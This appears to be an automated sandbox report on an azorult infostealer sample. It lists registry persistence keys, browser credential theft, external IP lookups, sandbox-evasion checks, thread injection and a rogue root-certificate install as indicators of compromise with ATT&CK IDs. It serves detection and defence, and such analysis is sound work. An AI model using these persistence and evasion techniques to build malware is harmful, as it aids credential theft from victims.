azorult | 9cbaabe47d225783ac54cf54c23a305de3872e75d981b89e3e8a2f50c8a00420

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 8 IoCs

pid	Process
3288	setups.tmp
3288	setups.tmp
3288	setups.tmp
3288	setups.tmp
3288	setups.tmp
3288	setups.tmp
3288	setups.tmp
4568	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\rrys2lw2bnu = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CAJJE2RPKI\\multitimer.exe\" 1 3.1617513192.60694ae83bb87"	multitimer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	setups.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	setups.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
291	ipinfo.io
481	ipinfo.io
135	ipinfo.io
137	ipinfo.io
172	ip-api.com
285	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1380 set thread context of 4820	1380	svchost.exe	111
PID 4684 set thread context of 4924	4684	FBF9.tmp.exe	118
PID 4684 set thread context of 4796	4684	setups.exe	121

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\unins.vbs	Full_Version.exe
File created	C:\Program Files\unins0000.dat	Full_Version.exe
File created	C:\Program Files\unins0000.dll	Full_Version.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
6316	5712	WerFault.exe	159
2280	8180	WerFault.exe	251
7908	4592	WerFault.exe	157
7620	4592	WerFault.exe	157
7788	4592	WerFault.exe	157
7332	4592	WerFault.exe	157
7804	4592	WerFault.exe	157
1912	4592	WerFault.exe	157
1188	4592	WerFault.exe	157
6908	4592	WerFault.exe	157
6216	4592	WerFault.exe	157
2296	1772	WerFault.exe	144
5856	4592	WerFault.exe	157

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
7032	timeout.exe
5016	timeout.exe
8032	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
6592	taskkill.exe
7792	taskkill.exe
420	taskkill.exe
2716	taskkill.exe
3316	taskkill.exe
6620	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{JAGSC2K0-K4Q1-LO31-YATQ-QCFVCPKLJD69}\1 = "5116"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	Full_Version.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{6E18317D-5F6C-42FD-A2EF-8ED1EF6E89B3} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000092a462910c796b6da4a732afef17e85df2d296d4e07d4d0b21e950ed676380719bc034f0f7447f74fce3d83f7683b2881131b9513d825bdc9b7b0cd86acb2cebd6291acddf29cd0822d574e24c9ca2aa60ae4e02fe5dee4e8337	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{0305EB65-75A5-4AB7-A1AF-6057A4533C87}"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{8221E804-F1E0-4297-B003-03826991D601}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e6a6b70210c206b514ddd1f21349f77b8ecfe21627d83c6955ea4876892f86ba15eba9044f141f976b85382dfe6e185fa1fe7110496b537eabd1b972c299cc50c14cdfe3870f9f436133dbb025851f00b75af456c476c527d54dfc1055451c743ceb6a150c541021a90586fb0b2d7dcba203c5ecdd9bc1892c7fe15f3fd1c48606e717bcb1814adab01d282db305d432aa194b52c57970a11d8558f200de51358f5f79ba5738c62c039a35c96dafb6f181bc7fbce8b0929b8f8035dacb0c747621755692ac175547779cf63a65ca345efb0cbb1dd3e052bd29910bf686fbffaeaf47f215abbf81b84a439c6ceef532cd83291eff7da95ed64cd6968edf4b3fd826f72ce751d128edd0aece1a27d26503ba33bb295fabc24bbb706440709df8bb80a320cad0eb8c3fffff6b4a98ff6fb8bf4a3c1c3e8627acbd7f80394c8fb13b096d5ec41caf479413553d6fc21e9928b98e195561da34d65624abc924c2a4b098737b0cc6bb348965d060e030cebdba871f026d78476ab01e7d7d380dd64b5135d728cc84b03d36938f6f9b8eae12ade81d40fc0b6d166de5cf84cce40c4399f6dc5e946a4b	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
2600	PING.EXE
2904	PING.EXE
8668	PING.EXE
3016	PING.EXE

